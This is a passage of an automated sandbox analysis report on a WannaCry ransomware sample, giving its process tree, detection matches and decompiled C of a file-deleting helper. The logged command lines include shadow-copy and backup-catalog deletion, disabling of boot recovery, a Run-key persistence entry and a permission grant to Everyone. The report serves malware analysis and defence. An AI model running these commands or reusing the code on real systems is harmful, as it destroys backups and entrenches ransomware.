                                                    MD5 hash:84C82835A5D21BBCF75A61706D8AB549
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.4342275921.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000005.00000000.2990977439.000000000040E000.00000008.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.3016294775.0000000000870000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.3030888426.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.3370890950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000005.00000003.3037184208.000000000087B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: Florian Roth (Nextron Systems) (with the help of binar.ly)
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: Joe Security
                                                    • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: ReversingLabs
                                                    • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Users\user\Desktop\WannaCrypt0r.sk, Author: us-cert code analysis team
                                                    Antivirus matches:
                                                    • Detection: 94%, ReversingLabs
                                                    Reputation:moderate

                                                    Target ID:6
                                                    Start time:09:29:00
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:attrib +h .
                                                    Imagebase:0xab0000
                                                    File size:19456 bytes
                                                    MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Target ID:7
                                                    Start time:09:29:00
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\icacls.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:icacls . /grant Everyone:F /T /C /Q
                                                    Imagebase:0x770000
                                                    File size:29696 bytes
                                                    MD5 hash:2E49585E4E08565F52090B144062F97E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:8
                                                    Start time:09:29:00
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0xb90000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:9
                                                    Start time:09:29:00
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:10
                                                    Start time:09:29:01
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 89%, ReversingLabs

                                                    Target ID:11
                                                    Start time:09:29:01
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\system32\cmd.exe /c 198851684139341.bat
                                                    Imagebase:0xc0000
                                                    File size:236544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:12
                                                    Start time:09:29:01
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:13
                                                    Start time:09:29:02
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cscript.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cscript.exe //nologo m.vbs
                                                    Imagebase:0xe50000
                                                    File size:144896 bytes
                                                    MD5 hash:13783FF4A2B614D7FBD58F5EEBDEDEF6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:15
                                                    Start time:09:29:31
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:18
                                                    Start time:09:30:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:21
                                                    Start time:09:30:32
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:23
                                                    Start time:09:31:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:25
                                                    Start time:09:31:14
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe co
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000019.00000000.4343624168.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 96%, ReversingLabs

                                                    Target ID:26
                                                    Start time:09:31:14
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /c start /b @WanaDecryptor@.exe vs
                                                    Imagebase:0xc0000
                                                    File size:236544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:27
                                                    Start time:09:31:14
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:28
                                                    Start time:09:31:14
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe vs
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001C.00000000.4347439754.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    Target ID:29
                                                    Start time:09:31:16
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:TaskData\Tor\taskhsvc.exe
                                                    Imagebase:0x5d0000
                                                    File size:3098624 bytes
                                                    MD5 hash:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs

                                                    Target ID:30
                                                    Start time:09:31:17
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:31
                                                    Start time:09:31:25
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                                                    Imagebase:0xc0000
                                                    File size:236544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:32
                                                    Start time:09:31:25
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:33
                                                    Start time:09:31:25
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:wmic shadowcopy delete
                                                    Imagebase:0x970000
                                                    File size:393216 bytes
                                                    MD5 hash:82BB8430531876FBF5266E53460A393E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:34
                                                    Start time:09:31:25
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0xa0000
                                                    File size:418304 bytes
                                                    MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language

                                                    Target ID:36
                                                    Start time:09:31:31
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 89%, ReversingLabs

                                                    Target ID:37
                                                    Start time:09:31:31
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000025.00000000.4517258292.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    Target ID:38
                                                    Start time:09:31:31
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                    Imagebase:0xc0000
                                                    File size:236544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:39
                                                    Start time:09:31:32
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff67b000000
                                                    File size:875008 bytes
                                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:40
                                                    Start time:09:31:32
                                                    Start date:15/05/2023
                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "vfwrglgamdagtoq456" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
                                                    Imagebase:0xec0000
                                                    File size:59392 bytes
                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:41
                                                    Start time:09:31:32
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:42
                                                    Start time:09:32:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:43
                                                    Start time:09:32:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002B.00000000.4824076441.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002B.00000002.4826014991.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    Target ID:44
                                                    Start time:09:32:03
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:45
                                                    Start time:09:32:32
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:46
                                                    Start time:09:32:32
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002E.00000002.5128621627.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000002E.00000000.5126549590.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    Target ID:47
                                                    Start time:09:32:33
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:48
                                                    Start time:09:33:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:49
                                                    Start time:09:33:02
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000031.00000000.5428511190.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000031.00000002.5430205338.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                    Target ID:50
                                                    Start time:09:33:03
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskdl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskdl.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:4FEF5E34143E646DBF9907C4374276F5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:51
                                                    Start time:09:33:33
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\taskse.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskse.exe C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:20480 bytes
                                                    MD5 hash:8495400F199AC77853C53B5A3F278F3E
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language

                                                    Target ID:52
                                                    Start time:09:33:33
                                                    Start date:15/05/2023
                                                    Path:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:@WanaDecryptor@.exe
                                                    Imagebase:0x400000
                                                    File size:245760 bytes
                                                    MD5 hash:7BF2B57F2A205768755C07F238FB32CC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000034.00000002.5732242026.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000034.00000000.5730513383.000000000041F000.00000008.00000001.01000000.00000009.sdmp, Author: Joe Security

                                                      Execution Graph

                                                      Execution Coverage:24.8%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:20.2%
                                                      Total number of Nodes:94
                                                      Total number of Limit Nodes:1

                                                      C-Code - Quality: 55%
                                                      			E00401080(intOrPtr _a4) {
                                                      				void* _v4;
                                                      				char _v16;
                                                      				char _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v40;
                                                      				char _v560;
                                                      				struct _WIN32_FIND_DATAW _v632;
                                                      				long _v1124;
                                                      				long _v1644;
                                                      				long _v1648;
                                                      				char _v1656;
                                                      				char _v1660;
                                                      				void* _v1664;
                                                      				void* _v1668;
                                                      				char _v1672;
                                                      				char _v1676;
                                                      				void* _v1680;
                                                      				char _v1681;
                                                      				void* _v1684;
                                                      				char _v1688;
                                                      				intOrPtr _v1696;
                                                      				intOrPtr _v1700;
                                                      				intOrPtr _v1704;
                                                      				intOrPtr _v1708;
                                                      				void* _t54;
                                                      				int _t57;
                                                      				intOrPtr _t62;
                                                      				intOrPtr _t64;
                                                      				WCHAR* _t65;
                                                      				char _t72;
                                                      				intOrPtr _t84;
                                                      				void* _t100;
                                                      				intOrPtr _t101;
                                                      				intOrPtr _t103;
                                                      				int _t105;
                                                      				void* _t106;
                                                      				intOrPtr _t107;
                                                      				intOrPtr _t108;
                                                      				intOrPtr _t110;
                                                      				void* _t112;
                                                      				intOrPtr _t113;
                                                      				intOrPtr _t115;
                                                      				void* _t118;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00401AA7);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t115;
                                                      				_v1676 = _v1681;
                                                      				_v1672 = 0;
                                                      				_v1668 = 0;
                                                      				_v1664 = 0;
                                                      				_v4 = 0;
                                                      				_v1680 = 0;
                                                      				E00401000(_a4,  &_v1124);
                                                      				swprintf( &_v1644, 0x403040,  &_v1124, 0x403050);
                                                      				_t118 = _t115 - 0x688 + 0x18;
                                                      				_t54 = FindFirstFileW( &_v1644,  &(_v632.nFileSizeHigh)); // executed
                                                      				_t112 = _t54;
                                                      				if(_t112 != 0xffffffff) {
                                                      					_t72 = _v1681;
                                                      					do {
                                                      						swprintf( &_v1644, 0x403034,  &_v1124,  &_v560);
                                                      						_v1660 = _t72;
                                                      						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                                      						_t57 = wcslen( &_v1648);
                                                      						_t118 = _t118 + 0x14;
                                                      						_t105 = _t57;
                                                      						__imp__?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z(_t105, 1);
                                                      						if(_t57 != 0) {
                                                      							E00401330(_v1668,  &_v1656, _t105);
                                                      							_t118 = _t118 + 0xc;
                                                      							__imp__?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z(_t105);
                                                      						}
                                                      						_v16 = 1;
                                                      						E004013D0( &_v1688);
                                                      						_v28 = 0;
                                                      						__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1, _v1680, 1,  &_v1672);
                                                      					} while (FindNextFileW(_t112,  &_v632) != 0);
                                                      					FindClose(_t112);
                                                      					_t100 = 0;
                                                      					_t106 = 0;
                                                      					while(1) {
                                                      						_t62 = _v1700;
                                                      						_t84 = _v1696;
                                                      						if(_t62 == 0 || _t100 >= _t84 - _t62 >> 4) {
                                                      							break;
                                                      						}
                                                      						_t65 =  *(_t106 + _t62 + 4);
                                                      						if(_t65 == 0) {
                                                      							_t65 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                                      						}
                                                      						if(DeleteFileW(_t65) != 0) {
                                                      							_v1708 = _v1708 + 1;
                                                      						}
                                                      						_t100 = _t100 + 1;
                                                      						_t106 = _t106 + 0x10;
                                                      					}
                                                      					_t101 = _t62;
                                                      					_t113 = _t84;
                                                      					_t107 = _t62;
                                                      					if(_t62 != _t84) {
                                                      						do {
                                                      							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
                                                      							_t107 = _t107 + 0x10;
                                                      						} while (_t107 != _t113);
                                                      						_t62 = _v1704;
                                                      					}
                                                      					_v1696 = _t101;
                                                      					_v32 = 0xffffffff;
                                                      					_t108 = _t62;
                                                      					if(_t62 != _t101) {
                                                      						do {
                                                      							__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(1);
                                                      							_t108 = _t108 + 0x10;
                                                      						} while (_t108 != _t101);
                                                      						_t62 = _v1704;
                                                      					}
                                                      					E004018D0(_t62, _t62);
                                                      					_t64 = _v1708;
                                                      				} else {
                                                      					_t103 = _v1668;
                                                      					_t110 = _v1672;
                                                      					_v4 = _t54;
                                                      					if(_t110 != _t103) {
                                                      						do {
                                                      							_t54 = E00401870(_t110, 0);
                                                      							_t110 = _t110 + 0x10;
                                                      						} while (_t110 != _t103);
                                                      						_t110 = _v1672;
                                                      					}
                                                      					E004018D0(_t54, _t110);
                                                      					_t64 = 0;
                                                      				}
                                                      				 *[fs:0x0] = _v40;
                                                      				return _t64;
                                                      			}


                                                      APIs
                                                        • Part of subcall function 00401000: GetWindowsDirectoryW.KERNEL32(00000019,00000104,76E80F00,00000019,004010D5,?,?,76E80F00,00000019,76E83300,00000000), ref: 0040100C
                                                        • Part of subcall function 00401000: GetTempPathW.KERNEL32(00000104,00000019), ref: 00401028
                                                        • Part of subcall function 00401000: wcslen.MSVCRT ref: 00401035
                                                        • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040103F
                                                        • Part of subcall function 00401000: wcslen.MSVCRT ref: 0040104D
                                                      • swprintf.MSVCRT(?,00403040,?,00403050,76E83300,00000000), ref: 004010F5
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00401107
                                                      • swprintf.MSVCRT(?,00403034,?,?), ref: 00401168
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00401177
                                                      • wcslen.MSVCRT ref: 00401182
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(00000000,00000001), ref: 00401194
